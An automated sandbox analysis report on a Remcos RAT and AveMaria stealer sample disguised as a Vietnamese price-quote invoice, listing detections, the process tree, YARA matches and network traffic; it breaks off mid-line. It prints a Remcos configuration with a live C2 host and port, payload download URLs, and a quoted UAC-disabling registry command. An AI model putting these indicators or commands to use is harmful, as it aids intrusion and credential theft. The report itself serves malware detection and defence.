Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Overview

General Information

Sample Name:Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Analysis ID:778240
MD5:a07407fce937593044ad512f4a6d7a1e
SHA1:6fc304eb3856198c1f8b1da8c4a3a52c657274c7
SHA256:770a25e30c2f095a09570447fd3ab6ecb78de00185d39035a1b87b1d7de89f8c
Tags:exe
Infos:

Detection

Remcos, AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Remcos
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Creates processes with suspicious names
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports

Classification

  • System is w10x64
  • Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe (PID: 3988 cmdline: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe MD5: A07407FCE937593044AD512F4A6D7A1E)
    • powershell.exe (PID: 3420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 3660 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • dwn.exe (PID: 2088 cmdline: "C:\Users\user\AppData\Local\Temp\dwn.exe" MD5: 0E4816AC89A716B262402CD1791400DF)
      • aspnet_compiler.exe (PID: 4892 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 1552 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 3324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4740 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4116 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 3776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5716 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5868 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 3020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 3460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4952 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz" MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • Shhejayly.exe (PID: 4420 cmdline: "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe" MD5: A07407FCE937593044AD512F4A6D7A1E)
  • Shhejayly.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe" MD5: A07407FCE937593044AD512F4A6D7A1E)
  • cleanup
{"Host:Port:Password": "obologs.work.gd:4044:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-E9KXT7", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
SourceRuleDescriptionAuthorStrings
00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x13230:$a1: Remcos restarted by watchdog!
      • 0x13798:$a3: %02i:%02i:%02i:%03i
      0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 32 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x60918:$s1: \Classes\mscfile\shell\open\command
            • 0x60978:$s1: \Classes\mscfile\shell\open\command
            • 0x60960:$s2: eventvwr.exe
            0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x66a30:$a1: Remcos restarted by watchdog!
            • 0x66f98:$a3: %02i:%02i:%02i:%03i
            0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpackREMCOS_RAT_variantsunknownunknown
            • 0x61a34:$str_a1: C:\Windows\System32\cmd.exe
            • 0x619b0:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x619b0:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60e28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x61698:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x60a24:$str_b2: Executing file:
            • 0x61b78:$str_b3: GetDirectListeningPort
            • 0x61460:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x6167c:$str_b7: \update.vbs
            • 0x60a4c:$str_b9: Downloaded file:
            • 0x60a38:$str_b10: Downloading file:
            • 0x60adc:$str_b12: Failed to upload file:
            • 0x61b40:$str_b13: StartForward
            • 0x61b60:$str_b14: StopForward
            • 0x61624:$str_b15: fso.DeleteFile "
            • 0x61654:$str_b17: fso.DeleteFolder "
            • 0x60acc:$str_b18: Uploaded file:
            • 0x60a8c:$str_b19: Unable to delete:
            • 0x615ec:$str_b20: while fso.FileExists("
            • 0x60f61:$str_c0: [Firefox StoredLogins not found]
            • 0x60970:$str_c1: Software\Classes\mscfile\shell\open\command
            28.2.Shhejayly.exe.36c99b0.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 48 entries

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: 61 E6 86 EE EB 9D 84 48 1F B9 0E FE AC FE D3 6E F8 C8 9C 03 58 04 3B 20 CA F7 01 49 1E 3D A1 7B FF 88 DF 37 0E 97 9D 4F 01 0A D3 99 B5 98 10 30 82 DA F2 72 F2 8D F9 08 9F 37 39 2F B4 21 97 B0 8B 2F C3 57 B4 18 64 A8 24 E3 3E C7 F3 79 78 3E D2 27 C0 F0 60 49 A0 94 6C BA CE AB 4B 13 10 2F 67 53 75 69 A8 D6 B4 E8 46 DB 4B 22 41 E3 D2 BF B1 10 B7 AD 92 DB A8 EB 6B A6 7F F6 19 54 C1 93 2D E7 6D 63 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 3660, TargetObject: HKEY_CURRENT_USER\Software\Rmc-E9KXT7\exepath
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: obologs.work.gdAvira URL Cloud: Label: phishing
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeReversingLabs: Detection: 27%
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeVirustotal: Detection: 30%Perma Link
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: obologs.work.gdVirustotal: Detection: 14%Perma Link
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeJoe Sandbox ML: detected
              Source: 12.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
              Source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "obologs.work.gd:4044:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-E9KXT7", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51

              Networking

              barindex
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: icanhazip.com
              Source: unknownDNS query: name: icanhazip.com
              Source: Malware configuration extractorURLs: obologs.work.gd
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
              Source: Joe Sandbox ViewIP Address: 13.107.43.12 13.107.43.12
              Source: Joe Sandbox ViewIP Address: 194.5.98.244 194.5.98.244
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 194.5.98.244:4044
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhv8995.tmp.39.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmpString 